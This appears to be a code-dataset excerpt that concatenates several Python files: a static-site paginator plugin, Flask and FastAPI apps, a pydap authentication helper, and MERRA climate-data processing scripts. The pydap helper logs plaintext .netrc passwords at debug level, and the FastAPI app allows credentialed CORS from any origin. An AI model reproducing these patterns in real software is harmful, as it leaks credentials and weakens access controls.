if not resources:
continue
# Build depends
if not hasattr(resource, 'depends'):
resource.depends = []
resource.depends.extend(
[r.relative_path for r in resources
if r.relative_path not in resource.depends])
# Remove combined resources if needed
if hasattr(resource.meta.combine, "remove") and \
resource.meta.combine.remove:
for r in resources:
self.logger.debug(
"Resource [%s] removed because combined" % r)
r.is_processable = False
def begin_text_resource(self, resource, text):
"""
When generating a resource, add combined file if needed.
"""
resources = self._combined(resource)
if not resources:
return
where = "bottom"
try:
where = resource.meta.combine.where
except AttributeError:
pass
if where not in ["top", "bottom"]:
raise ValueError("%r should be either `top` or `bottom`" % where)
self.logger.debug(
"Combining %d resources for [%s]" % (len(resources),
resource))
if where == "top":
return "".join([r.source.read_all() for r in resources] + [text])
else:
return "".join([text] + [r.source.read_all() for r in resources])
#
# Pagination
#
class Page:
def __init__(self, posts, number):
self.posts = posts
self.number = number
class Paginator:
"""
Iterates resources which have pages associated with them.
"""
file_pattern = 'page$PAGE/$FILE$EXT'
def __init__(self, settings):
self.sorter = getattr(settings, 'sorter', None)
self.size = getattr(settings, 'size', 10)
self.file_pattern = getattr(
settings, 'file_pattern', self.file_pattern)
def _relative_url(self, source_path, number, basename, ext):
"""
Create a new URL for a new page. The first page keeps the same name;
the subsequent pages are named according to file_pattern.
"""
path = File(source_path)
if number != 1:
filename = self.file_pattern.replace('$PAGE', str(number)) \
.replace('$FILE', basename) \
.replace('$EXT', ext)
path = path.parent.child(os.path.normpath(filename))
return path
def _new_resource(self, base_resource, node, page_number):
"""
Create a new resource as a copy of a base_resource, with a page of
resources associated with it.
"""
res = Resource(base_resource.source_file, node)
res.node.meta = Metadata(node.meta)
res.meta = Metadata(base_resource.meta, res.node.meta)
brs = base_resource.source_file
path = self._relative_url(base_resource.relative_path,
page_number,
brs.name_without_extension,
brs.extension)
res.set_relative_deploy_path(path)
return res
@staticmethod
def _attach_page_to_resource(page, resource):
"""
Hook up a page and a resource.
"""
resource.page = page
page.resource = resource
@staticmethod
def _add_dependencies_to_resource(dependencies, resource):
"""
Add a bunch of resources as dependencies to another resource.
"""
if not hasattr(resource, 'depends'):
resource.depends = []
resource.depends.extend([dep.relative_path for dep in dependencies
if dep.relative_path not in resource.depends])
def _walk_pages_in_node(self, node):
"""
Segregate each resource into a page.
"""
walker = 'walk_resources'
if self.sorter:
walker = 'walk_resources_sorted_by_%s' % self.sorter
walker = getattr(node, walker, getattr(node, 'walk_resources'))
posts = list(walker())
number = 1
while posts:
yield Page(posts[:self.size], number)
posts = posts[self.size:]
number += 1
def walk_paged_resources(self, node, resource):
"""
Group the resources and return the new page resources.
"""
added_resources = []
pages = list(self._walk_pages_in_node(node))
if pages:
deps = reduce(list.__add__, [page.posts for page in pages], [])
Paginator._attach_page_to_resource(pages[0], resource)
Paginator._add_dependencies_to_resource(deps, resource)
for page in pages[1:]:
# make new resource
new_resource = self._new_resource(resource, node, page.number)
Paginator._attach_page_to_resource(page, new_resource)
new_resource.depends = resource.depends
added_resources.append(new_resource)
for prev, next in pairwalk(pages):
next.previous = prev
prev.next = next
return added_resources
class PaginatorPlugin(Plugin):
"""
Paginator plugin.
Configuration: in a resource's metadata:
paginator:
sorter: time
size: 5
file_pattern: page$PAGE/$FILE$EXT # optional
then in the resource's content:
{% for res in resource.page.posts %}
{% refer to res.relative_path as post %}
{{ post }}
{% endfor %}
{{ resource.page.previous }}
{{ resource.page.next }}
"""
def __init__(self, site):
super(PaginatorPlugin, self).__init__(site)
def begin_site(self):
for node in self.site.content.walk():
added_resources = []
paged_resources = (res for res in node.resources
if hasattr(res.meta, 'paginator'))
for resource in paged_resources:
paginator = Paginator(resource.meta.paginator)
added_resources += paginator.walk_paged_resources(
node, resource)
node.resources += added_resources
```
|
{
"source": "JeNeSuisPasDave/Selenium-and-TLS",
"score": 2
}
|
#### File: app/main/views.py
```python
from datetime import datetime
from flask import abort, current_app, flash, make_response
from flask import render_template, request, url_for
from . import main
@main.route('/', methods=['GET'])
def index():
return render_template(
'index.html')
@main.route('/shutdown')
def server_shutdown():
if not current_app.testing:
abort(404)
shutdown = request.environ.get('werkzeug.server.shutdown')
if not shutdown:
abort(500)
shutdown()
return 'Shutting down...'
```
|
{
"source": "JenFaith/human-rights-first-asylum-ds-a",
"score": 2
}
|
#### File: human-rights-first-asylum-ds-a/app/main.py
```python
import os
from boto3.session import Session
from botocore.exceptions import ClientError, ConnectionError
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from dotenv import load_dotenv
from app.ocr import make_fields
app = FastAPI(
title="DS API for HRF Asylum",
description="PDF OCR",
docs_url="/"
)
load_dotenv()
app.add_middleware(
CORSMiddleware,
allow_origins=['*'],
allow_credentials=True,
allow_methods=['*'],
allow_headers=['*'],
)
@app.post("/pdf-ocr/{uuid}")
async def pdf_ocr(uuid: str):
"""
Small Test UUID: <b>084d0556-5748-4687-93e3-394707be6cc0</b><br>
Large Test UUID: <b>477307493-V-J-M-AXXX-XXX-639-BIA-Aug-17-2020</b>
"""
try:
s3 = Session(
aws_access_key_id=os.getenv('ACCESS_KEY'),
aws_secret_access_key=os.getenv('SECRET_KEY'),
).client('s3')
response = s3.get_object(
Bucket=os.getenv('BUCKET_NAME'),
Key=f"{uuid}.pdf",
)
fields = make_fields(response['Body'].read())
return {
"status": f"File received: {uuid}.pdf",
"body": fields,
}
except ConnectionError:
return {"status": "Connection refused!"}
except ClientError:
return {"status": f"File not found: {uuid}.pdf"}
```
|
{
"source": "jenfly/atmos-read",
"score": 3
}
|
#### File: jenfly/atmos-read/pydap_auth.py
```python
import cookielib
import netrc
import urllib2
import re
import pydap.lib
from pydap.exceptions import ClientError
import logging
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
# Set the debug level for urllib2.
debuglevel=1
def install_basic_client(uri='', user='', passwd='', use_netrc=True):
# Create special opener with support for Cookies
cj = cookielib.CookieJar()
# Create the password manager and load with the credentials using
pwMgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
# Get passwords from the .netrc file nless use_netrc is False
if use_netrc:
logins = netrc.netrc()
accounts = logins.hosts # a dist of hosts and tuples
for host, info in accounts.iteritems():
login, account, password = info
log.debug('Host: %s; login: %s; account: %s; password: %s' % (host, login, account, password))
pwMgr.add_password(None, host, login, password)
if uri and user and passwd:
pwMgr.add_password(None, uri, user, passwd)
opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(pwMgr),
urllib2.HTTPCookieProcessor(cj))
opener.addheaders = [('User-agent', pydap.lib.USER_AGENT)]
urllib2.install_opener(opener)
def new_request(url):
log.debug('Opening %s (install_basic_client)' % url)
r = urllib2.urlopen(url)
resp = r.headers.dict
resp['status'] = str(r.code)
data = r.read()
# When an error is returned, we parse the error message from the
# server and return it in a ``ClientError`` exception.
if resp.get("content-description") == "dods_error":
m = re.search('code = (?P<code>\d+);\s*message = "(?P<msg>.*)"',
data, re.DOTALL | re.MULTILINE)
msg = 'Server error %(code)s: "%(msg)s"' % m.groupdict()
raise ClientError(msg)
return resp, data
from pydap.util import http
http.request = new_request
```
#### File: scripts/fram/daily1.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import os
import xray
import numpy as np
import collections
import time
import matplotlib.pyplot as plt
import pandas as pd
import atmos as atm
import precipdat
import merra
# ----------------------------------------------------------------------
# Download daily data
#version = 'merra'
#years = range(2006, 2016, 2)
version = 'merra2'
years = np.arange(1981, 1982)
datadir = atm.homedir() + 'datastore/' + version + '/daily/'
months = np.arange(1, 13)
varnms = ['U', 'V', 'OMEGA', 'T', 'QV', 'H', 'DUDTANA', 'PS',
'UFLXCPT', 'VFLXCPT', 'UFLXPHI', 'VFLXPHI']
latlon=(-90, 90, 40, 120)
plevs = [1000,925,850,775,700,600,500,400,300,250,200,150,100,70,50,30,20]
sector_lons=(60, 100)
dp_vars = []
def group_variables(varnms, version):
"""Group variables together according to URL."""
def get_group(varnm, version):
opts = merra.url_opts(varnm, version)
group = '%s%s_%s_%s' % (opts['res'], opts['vertical'], opts['kind'],
opts['time_kind'])
return group
groups = {nm : get_group(nm, version) for nm in varnms}
keys = set(groups.values())
vargroups = collections.defaultdict(list)
for nm, key in groups.iteritems():
vargroups[key] += [nm]
return vargroups
def get_filename(var, version, datadir, year, month=None, day=None):
"""Return a filename for a variable."""
filenm = datadir + version + '_' + var.attrs['filestr'] + '_%d' % year
if month is not None:
filenm = filenm + '%02d' % month
if day is not None:
filenm = filenm + '%02d' % day
filenm = filenm + '.nc'
return filenm
def latlon_filestr(lat1, lat2, lon1, lon2):
"""Return nicely formatted string for lat-lon range."""
latstr = atm.latlon_str(lat1, lat2, 'lat')
lonstr = atm.latlon_str(lon1, lon2, 'lon')
return lonstr + '_' + latstr
def latlon_data(var, lat1, lat2, lon1, lon2, plev=None):
"""Extract lat-lon subset of data."""
name = var.name
varnm = name
subset_dict = {'lat' : (lat1, lat2), 'lon' : (lon1, lon2)}
latlonstr = latlon_filestr(lat1, lat2, lon1, lon2)
if plev is not None:
name = name + '%d' % plev
subset_dict['plev'] = (plev, plev)
var = atm.subset(var, subset_dict, copy=False, squeeze=True)
var.name = name
var.attrs['filestr'] = '%s_%s' % (name, latlonstr)
var.attrs['varnm'] = varnm
return var
def pgradient(var, lat1, lat2, lon1, lon2, plev):
"""Return d/dp of a lat-lon variable."""
pwidth = 100
p1, p2 = plev - pwidth, plev + pwidth
var = atm.subset(var, {'lat' : (lat1, lat2), 'lon' : (lon1, lon2),
'plev' : (p1, p2)}, copy=False)
latlonstr = latlon_filestr(lat1, lat2, lon1, lon2)
attrs = var.attrs
pname = atm.get_coord(var, 'plev', 'name')
pdim = atm.get_coord(var, 'plev', 'dim')
pres = var[pname]
pres = atm.pres_convert(pres, pres.attrs['units'], 'Pa')
dvar_dp = atm.gradient(var, pres, axis=pdim)
dvar_dp = atm.subset(dvar_dp, {pname : (plev, plev)}, copy=False,
squeeze=True)
varnm = 'D%sDP' % var.name
name = '%s%d' % (varnm, plev)
dvar_dp.name = name
attrs['long_name'] = 'd/dp of ' + var.attrs['long_name']
attrs['standard_name'] = 'd/dp of ' + var.attrs['standard_name']
attrs['units'] = ('(%s)/Pa' % attrs['units'])
attrs[pname] = plev
attrs['filestr'] = '%s_%s' % (name, latlonstr)
attrs['varnm'] = varnm
dvar_dp.attrs = attrs
return dvar_dp
def sector_mean(var, lon1, lon2):
"""Return the sector mean of a variable."""
name = var.name
lonstr = atm.latlon_str(lon1, lon2, 'lon')
if (lon2 - lon1) == 360:
lon1, lon2 = None, None
name_out = name + '_ZON'
else:
name_out = name + '_SEC'
varbar = atm.dim_mean(var, 'lon', lon1, lon2)
varbar.name = name_out
varbar.attrs['varnm'] = name
varbar.attrs['lonstr'] = lonstr
varbar.attrs['filestr'] = '%s_sector_%s' % (name, lonstr)
return varbar
def var_calcs(var, jday=0, latlon=(-90, 90, 40, 120), plevs=(850, 200),
dp_vars=['U', 'OMEGA'], sector_lons=(60, 100)):
"""Process a single variable from a single day."""
lat1, lat2, lon1, lon2 = latlon
opts = merra.url_opts(var.name)
vertical = opts['vertical']
if vertical == 'X':
plevs = [None]
if dp_vars is not None and var.name in dp_vars:
dp = True
else:
dp = False
data = xray.Dataset()
# Lat-lon data
print('Lat-lon data')
for plev in plevs:
print('plev', plev)
var_out = latlon_data(var, lat1, lat2, lon1, lon2, plev)
data[var_out.name] = var_out
if dp:
print('Computing d/dp')
var_out = pgradient(var, lat1, lat2, lon1, lon2, plev)
data[var_out.name] = var_out
# Sector and zonal mean data
print('Computing zonal mean')
var_out = sector_mean(var, 0, 360)
data[var_out.name] = var_out
if vertical == 'P':
print('Computing sector mean')
var_out = sector_mean(var, sector_lons[0], sector_lons[1])
data[var_out.name] = var_out
# Compute daily data from subdaily data
nperday = len(atm.get_coord(data, 'time'))
data = atm.daily_from_subdaily(data, nperday, dayname='day',
dayvals=[jday])
# Make sure output is in a Dataset
if isinstance(data, xray.DataArray):
data = data.to_dataset()
return data
def all_data(ds, varnms, datadir, year, month, day, jday, calc_kw, nc_kw):
"""Process selected variables in a dataset and save each to file."""
files = {}
for nm in varnms:
print(nm)
data = var_calcs(ds[nm], jday, **calc_kw)
filenm = '%s%s_%d%02d%02d.nc' % (datadir, nm, year, month, day)
print('Saving to ' + filenm)
atm.disptime()
data.to_netcdf(filenm, **nc_kw)
files[nm] = filenm
return files
def read_url(url, varnms, datadir, year, month, day, jday, calc_kw, nc_kw):
"""Open url and process selected variables."""
# Number of times to attempt opening url (in case of server problems)
NMAX = 3
# Wait time (seconds) between attempts
WAIT = 5
print('Loading ' + url)
attempt = 0
while attempt < NMAX:
try:
with xray.open_dataset(url) as ds:
files = all_data(ds, varnms, datadir, year, month, day, jday,
calc_kw, nc_kw)
attempt = NMAX
except RuntimeError as err:
attempt += 1
if attempt < NMAX:
print('Error reading file. Attempting again in %d s' % WAIT)
time.sleep(WAIT)
else:
raise err
return files
def read_groups(url_dict, vargroups, datadir, year, month, day, jday, calc_kw,
nc_kw):
"""Process variables for a day, grouped by URL."""
files = {}
for key, varids in vargroups.iteritems():
url = url_dict[key]['%d%02d%02d' % (year, month, day)]
datafiles = read_url(url, varids, datadir, year, month, day, jday,
calc_kw, nc_kw)
files.update(datafiles)
return files
def get_url_dict(year, month, version, vargroups):
"""Return dict of urls for the variable groups."""
url_dict = {}
for key in vargroups:
nm = vargroups[key][0]
url_dict[key] = merra.get_urls(year, month, version, nm)
return url_dict
# Initial setup
vargroups = group_variables(varnms, version)
calc_kw = {'latlon' : latlon, 'plevs' : plevs, 'dp_vars' : dp_vars,
'sector_lons' : sector_lons}
nc_kw = { 'merra2' : {'format' : 'NETCDF4_classic', 'engine' : 'netcdf4'},
'merra' : {'format' : None, 'engine' : None}}[version]
# Read data and concatenate
for year in years:
dailyfiles = collections.defaultdict(list)
for month in months:
url_dict = get_url_dict(year, month, version, vargroups)
days = range(1, atm.days_this_month(year, month) + 1)
jdays = atm.season_days(atm.month_str(month), atm.isleap(year))
for day, jday in zip(days, jdays):
files = read_groups(url_dict, vargroups, datadir, year, month, day,
jday, calc_kw, nc_kw)
for nm in files:
dailyfiles[nm] += [files[nm]]
# Consolidate daily files into yearly files and delete daily files
for nm in dailyfiles:
data = atm.load_concat(dailyfiles[nm], concat_dim='day')
for varnm in data.data_vars:
var = data[varnm]
filenm = get_filename(var, version, datadir, year)
var.name = var.attrs.get('varnm', varnm)
print('Saving to ' + filenm)
atm.save_nc(filenm, var)
print('Deleting daily files')
for filenm in dailyfiles[nm]:
print(filenm)
os.remove(filenm)
```
#### File: scripts/fram/merra-calc_fluxes.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import atmos as atm
import merra
from merra import calc_fluxes
years = [1979]
months = [1,2,3]
scratchdir = '/net/eady/data1/jwalker/datastore/scratch/'
savedir = '/net/eady/data1/jwalker/datastore/merra/monthly/'
var_ids=['u', 'q', 'T', 'theta', 'theta_e', 'hgt']
def filename(varname, year, month):
datestr = '_flx_%d%02d.nc' % (year, month)
filen = savedir + varname + datestr
print('Saving to ' + filen)
return filen
def extract(ds, var_id):
"""Return variable plus its fluxes from dataset"""
nm = merra.get_varname(var_id)
uvar_nm = 'U*' + nm
vvar_nm = 'V*' + nm
ds_out = ds[nm].to_dataset()
ds_out[uvar_nm] = ds[uvar_nm]
ds_out[vvar_nm] = ds[vvar_nm]
return ds_out
for year in years:
for month in months:
ds = calc_fluxes(year, month, var_ids=var_ids, scratchdir=scratchdir)
for var_id in var_ids:
ds_var = extract(ds, var_id)
ds_var.to_netcdf(filename(var_id, year, month))
```
#### File: scripts/fram/merra-uv_daily_combine.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import os
import numpy as np
import matplotlib.pyplot as plt
import merra
import atmos as atm
from merra import load_daily_season
datadir = '/home/jwalker/eady/datastore/merra/daily/'
savedir = datadir
#plev = 200
plev = 850
years = np.arange(1979, 2015)
season = 'ann'
lon1, lon2 = 40, 120
lat1, lat2 = -60, 60
nperday = 8
def pathstr(var, plev):
return datadir + 'merra_' + var + str(plev) + '_'
def outfile(year, plev):
lats = atm.latlon_labels([lat1, lat2], 'lat', '%.0f', deg_symbol=False)
lons = atm.latlon_labels([lon1, lon2], 'lon', '%.0f', deg_symbol=False)
subset = '%s-%s_%s-%s' % (lons[0], lons[1], lats[0], lats[1])
return datadir + 'merra_uv%d_%s_%d.nc' % (plev, subset, year)
for year in years:
print('Loading U')
u = load_daily_season(pathstr('u', plev), year, season, 'U',
lat1, lat2, lon1, lon2)
print('Loading V')
v = load_daily_season(pathstr('v', plev), year, season, 'V',
lat1, lat2, lon1, lon2)
print('Calculating vorticity and Rossby number')
rel_vort, _ , _ = atm.vorticity(u, v)
Ro = atm.rossby_num(u, v)
print('Calculating daily means from 3-hourly data')
days = np.arange(1, u.shape[0]/nperday + 1)
u = atm.daily_from_subdaily(u, nperday, dayname='Day', dayvals=days)
v = atm.daily_from_subdaily(v, nperday, dayname='Day', dayvals=days)
rel_vort = atm.daily_from_subdaily(rel_vort, nperday, dayname='Day',
dayvals=days)
Ro = atm.daily_from_subdaily(Ro, nperday, dayname='Day', dayvals=days)
print('Saving to ' + outfile(year, plev))
atm.save_nc(outfile(year, plev), u, v, rel_vort, Ro)
```
#### File: atmos-read/scripts/merra-calc-mfc.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import xarray as xray
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
import pandas as pd
import atmos as atm
import precipdat
import merra
# ----------------------------------------------------------------------
#version, years = 'merra', np.arange(1979, 2015)
version, years = 'merra2', np.arange(1980, 2016)
datadir = atm.homedir() + 'datastore/%s/daily/' % version
months = np.arange(1, 13)
subset = '_40E-120E_90S-90N'
def get_var(datadir, version, varnm, subset, year):
filenm = '%s%s_%s%s_%d.nc' % (datadir, version, varnm, subset, year)
with xray.open_dataset(filenm) as ds:
var = ds[varnm].load()
return var
for year in years:
print('Calculating MFC %d' % year)
uq_int = get_var(datadir, version, 'UFLXQV', subset, year)
vq_int = get_var(datadir, version, 'VFLXQV', subset, year)
mfc = atm.moisture_flux_conv(uq_int, vq_int, already_int=True)
mfc.attrs['long_name'] = mfc.name
mfc.name = 'MFC'
savefile = datadir + '%s_MFC%s_%d.nc' % (version, subset, year)
print('Saving MFC to ' + savefile)
atm.save_nc(savefile, mfc)
```
#### File: atmos-read/scripts/merra-replace-data.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import os
import shutil
import xarray as xray
import numpy as np
import collections
import time
import matplotlib.pyplot as plt
import pandas as pd
import atmos as atm
import precipdat
import merra
# ----------------------------------------------------------------------
datadir = '/net/eady/data1/jwalker/datastore/merra2/wget/'
savedir = '/net/eady/data1/jwalker/datastore/merra2/merged/'
probdata = pd.read_csv('scripts/merra_urls/merge_data.csv', index_col=0)
# For each corrupted data file:
# - load the corrupted data file
# - load the new downloaded file for the problem day
# - calculate d/dp and other stuff
# - merge the data for the affected day
# - save into data file for the year
def latlon_filestr(lat1, lat2, lon1, lon2):
"""Return nicely formatted string for lat-lon range."""
latstr = atm.latlon_str(lat1, lat2, 'lat')
lonstr = atm.latlon_str(lon1, lon2, 'lon')
return lonstr + '_' + latstr
def latlon_data(var, lat1, lat2, lon1, lon2, plev=None):
"""Extract lat-lon subset of data."""
name = var.name
varnm = name
subset_dict = {'lat' : (lat1, lat2), 'lon' : (lon1, lon2)}
latlonstr = latlon_filestr(lat1, lat2, lon1, lon2)
if plev is not None:
name = name + '%d' % plev
subset_dict['plev'] = (plev, plev)
var = atm.subset(var, subset_dict, copy=False, squeeze=True)
var.name = name
var.attrs['filestr'] = '%s_%s' % (name, latlonstr)
var.attrs['varnm'] = varnm
return var
def pgradient(var, lat1, lat2, lon1, lon2, plev):
"""Return d/dp of a lat-lon variable."""
pwidth = 100
p1, p2 = plev - pwidth, plev + pwidth
var = atm.subset(var, {'lat' : (lat1, lat2), 'lon' : (lon1, lon2),
'plev' : (p1, p2)}, copy=False, squeeze=True)
latlonstr = latlon_filestr(lat1, lat2, lon1, lon2)
attrs = var.attrs
pname = atm.get_coord(var, 'plev', 'name')
pdim = atm.get_coord(var, 'plev', 'dim')
pres = var[pname]
pres = atm.pres_convert(pres, pres.attrs['units'], 'Pa')
dvar_dp = atm.gradient(var, pres, axis=pdim)
dvar_dp = atm.subset(dvar_dp, {pname : (plev, plev)}, copy=False,
squeeze=True)
varnm = 'D%sDP' % var.name
name = '%s%d' % (varnm, plev)
dvar_dp.name = name
attrs['long_name'] = 'd/dp of ' + var.attrs['long_name']
attrs['standard_name'] = 'd/dp of ' + var.attrs['standard_name']
attrs['units'] = ('(%s)/Pa' % attrs['units'])
attrs[pname] = plev
attrs['filestr'] = '%s_%s' % (name, latlonstr)
attrs['varnm'] = varnm
dvar_dp.attrs = attrs
return dvar_dp
def var_calcs(filenm, varnm, plev, latlon=(-90, 90, 40, 120)):
"""Process a single variable from a single day."""
lat1, lat2, lon1, lon2 = latlon
if varnm == 'DUDP':
nm, dp = 'U', True
elif varnm == 'DOMEGADP':
nm, dp = 'OMEGA', True
else:
nm, dp = varnm, False
with xray.open_dataset(filenm) as ds:
var = ds[nm].load()
if dp:
print('Computing d/dp')
var = pgradient(var, lat1, lat2, lon1, lon2, plev)
else:
var = latlon_data(var, lat1, lat2, lon1, lon2, plev)
return var
def process_row(row, datadir, savedir):
filenm1 = row['filename']
year = row['year']
varnm = row['varnm']
plev = row['plev']
jday = row['jday']
filenm2 = datadir + row['datfile']
savefile1 = filenm1
savefile2 = savedir + os.path.split(filenm1)[1]
print('%d, %s, plev=%d' % (year, varnm, plev))
print('Reading original data from ' + filenm1)
with xray.open_dataset(filenm1) as ds:
var1 = ds[varnm].load()
print('Processing new data from ' + filenm2)
var2 = var_calcs(filenm2, varnm, plev)
print('Merging data for jday %d' % jday)
var = var1.copy()
ind = jday - 1
days = atm.get_coord(var1, 'day')
if not days[ind] == jday:
raise ValueError('Days not indexed from 1, need to edit code to handle')
var[ind] = var2
print('Saving to ' + savefile1)
var.to_netcdf(savefile1)
print('Saving to ' + savefile2)
var.to_netcdf(savefile2)
data = {'orig' : var1, 'new' : var2, 'merged' : var}
return data
# Make a copy of each of the original files -- only run this code once!
# for filenm in probdata['filename']:
# shutil.copyfile(filenm, filenm.replace('.nc', '_orig.nc'))
for i, row in probdata.iterrows():
data = process_row(row, datadir, savedir)
# Plot data to check
def plot_data(probdata, savedir, i):
row = probdata.iloc[i]
filenm = row['filename']
filenm = savedir + os.path.split(filenm)[1]
jday = row['jday']
varnm = row['varnm']
with xray.open_dataset(filenm) as ds:
var = ds[varnm].load()
plt.figure(figsize=(16, 8))
plt.suptitle(os.path.split(filenm)[1])
plt.subplot(1, 3, 1)
atm.pcolor_latlon(var.sel(day=(jday-1)))
plt.title(jday - 1)
plt.subplot(1, 3, 2)
atm.pcolor_latlon(var.sel(day=jday))
plt.title(jday)
plt.subplot(1, 3, 3)
atm.pcolor_latlon(var.sel(day=(jday+1)))
plt.title(jday + 1)
```
|
{
"source": "jenfly/atmos",
"score": 2
}
|
#### File: atmos/testing/testing-data-gradient.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import xray
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
import pandas as pd
import atmos as atm
import precipdat
import merra
# ----------------------------------------------------------------------
datadir = atm.homedir() + 'datastore/merra/daily/'
year = 2014
subset = '_40E-120E_90S-90N'
def get_var(datadir, varnm, subset, year):
filenm = '%smerra_%s%s_%d.nc' % (datadir, varnm, subset, year)
with xray.open_dataset(filenm) as ds:
var = ds[varnm].load()
return var
uq_int = get_var(datadir, 'UFLXQV', subset, year)
vq_int = get_var(datadir, 'VFLXQV', subset, year)
mfc = atm.moisture_flux_conv(uq_int, vq_int, already_int=True)
mfcbar = mfc.mean(dim='YDim').mean(dim='XDim')
# Test atm.gradient
a = atm.constants.radius_earth.values
latdim, londim = 1, 2
lat = atm.get_coord(uq_int, 'lat')
latrad = np.radians(lat)
latrad[abs(lat) > 89] = np.nan
coslat = xray.DataArray(np.cos(latrad), coords={'YDim' : lat})
lon = atm.get_coord(uq_int, 'lon')
lonrad = np.radians(lon)
mfc_x = atm.gradient(uq_int, lonrad, londim) / (a*coslat)
mfc_y = atm.gradient(vq_int * coslat, latrad, latdim) / (a*coslat)
mfc_test = mfc_x + mfc_y
mfc_test = - atm.precip_convert(mfc_test, 'kg/m2/s', 'mm/day')
mfc_test_bar = mfc_test.mean(dim='YDim').mean(dim='XDim')
diff = mfc_test - mfc
print(diff.max())
print(diff.min())
plt.plot(mfcbar)
plt.plot(mfc_test_bar)
print(mfc_test_bar - mfcbar)
# ----------------------------------------------------------------------
# Vertical gradient du/dp
lon1, lon2 = 40, 120
pmin, pmax = 100, 300
subset_dict = {'XDim' : (lon1, lon2), 'Height' : (pmin, pmax)}
urls = merra.merra_urls([year])
month, day = 7, 15
url = urls['%d%02d%02d' % (year, month, day)]
with xray.open_dataset(url) as ds:
u = atm.subset(ds['U'], subset_dict, copy=False)
u = u.mean(dim='TIME')
pres = u['Height']
pres = atm.pres_convert(pres, pres.attrs['units'], 'Pa')
dp = np.gradient(pres)
# Calc 1
dims = u.shape
dudp = np.nan * u
for i in range(dims[1]):
for j in range(dims[2]):
dudp.values[:, i, j] = np.gradient(u[:, i, j], dp)
# Test atm.gradient
dudp_test = atm.gradient(u, pres, axis=0)
diff = dudp_test - dudp
print(diff.max())
print(diff.min())
```
|
{
"source": "jenfly/monsoon-onset",
"score": 2
}
|
#### File: monsoon-onset/scripts/momentum-budget.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import numpy as np
import xarray as xray
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib as mpl
import collections
import atmos as atm
import merra
import indices
import utils
# ----------------------------------------------------------------------
yearstr = '1979-2014'
onset_nm = 'CHP_MFC'
ndays = 5
lon1, lon2 = 60, 100
daynm, yearnm = 'dayrel', 'year'
latname, lonname, pname = 'YDim', 'XDim', 'Height'
datadir = atm.homedir() + 'datastore/merra/analysis/'
savedir = 'figs/'
filenm = datadir + 'ubudget/merra_ubudget_dailyrel_%s_ndays%d_%dE-%dE_%s.nc'
files = {}
files['ubudget'] = filenm % (onset_nm, ndays, lon1, lon2, yearstr)
varnms = ['U', 'V']
plev_plot = 200
pmid = 500 # Pressure level to plot psi latitude-day contours
for nm in varnms:
filenm = datadir + 'merra_%s%d_dailyrel_%s_%s.nc'
files[nm] = filenm % (nm, plev_plot, onset_nm, yearstr)
filenm = datadir + 'merra_%s_sector_%dE-%dE_dailyrel_%s_%s.nc'
files[nm + '_latp'] = filenm % (nm, lon1, lon2, onset_nm, yearstr)
# ----------------------------------------------------------------------
# Read data from each year
# Zonal momentum budget components
filenm = files['ubudget']
print('Loading ' + filenm)
with xray.open_dataset(filenm) as ubudget:
ubudget.load()
# Scaling factor for all terms in momentum budget
scale = 1e-4
ubudget = ubudget / scale
ubudget.attrs['comp_units'] = '%.0e m/s2' % scale
# Read other lat-lon variables and smooth with rolling mean
for nm in varnms:
filenm = files[nm]
print('Loading ' + filenm)
with xray.open_dataset(filenm) as ds:
var = ds['%s%d' % (nm, plev_plot)].load()
daydim = atm.get_coord(var, coord_name=daynm, return_type='dim')
ubudget[nm] = atm.rolling_mean(var, ndays, axis=daydim, center=True)
# Read other lat-pres variables and smooth with rolling mean
data_latp = xray.Dataset()
for nm in varnms:
varnm = nm + '_latp'
filenm = files[varnm]
print('Loading ' + filenm)
with xray.open_dataset(filenm) as ds:
var = ds[nm].load()
daydim = atm.get_coord(var, coord_name=daynm, return_type='dim')
data_latp[nm] = atm.rolling_mean(var, ndays, axis=daydim, center=True)
# Compute streamfunction
print('Computing streamfunction')
if (lon2 - lon1) < 360:
sector_scale = (lon2 - lon1) / 360.
else:
sector_scale = None
data_latp['PSI'] = atm.streamfunction(data_latp['V'], sector_scale=sector_scale)
# Additional metadata
ubudget.attrs['ndays'] = ndays
ubudget.attrs['lon1'] = lon1
ubudget.attrs['lon2'] = lon2
# Topography for lat-pres contour plots
print('Loading topography')
psfile = atm.homedir() + 'dynamics/python/atmos-tools/data/topo/ncep2_ps.nc'
with xray.open_dataset(psfile) as ds:
ps = ds['ps'] / 100
if (lon2 - lon1) < 360:
ps = atm.dim_mean(ps, 'lon', lon1, lon2)
else:
ps = atm.dim_mean(ps, 'lon')
# ----------------------------------------------------------------------
# Consolidate terms together
groups = collections.OrderedDict()
groups['ADV_AVG'] = ['ADV_AVG_AVG_X', 'ADV_AVG_AVG_Y', 'ADV_AVG_AVG_P']
groups['ADV_AVST'] = ['ADV_AVG_ST_X', 'ADV_AVG_ST_Y', 'ADV_AVG_ST_P']
groups['ADV_STAV'] = ['ADV_ST_AVG_X', 'ADV_ST_AVG_Y', 'ADV_ST_AVG_P']
groups['ADV_CRS'] = ['ADV_AVST', 'ADV_STAV']
groups['EMFC_TR'] = ['EMFC_TR_X', 'EMFC_TR_Y', 'EMFC_TR_P']
groups['EMFC_ST'] = ['EMFC_ST_X', 'EMFC_ST_Y', 'EMFC_ST_P']
groups['EMFC'] = ['EMFC_TR', 'EMFC_ST']
groups['COR'] = ['COR_AVG', 'COR_ST']
groups['ADV+COR'] = ['ADV_AVG', 'COR_AVG']
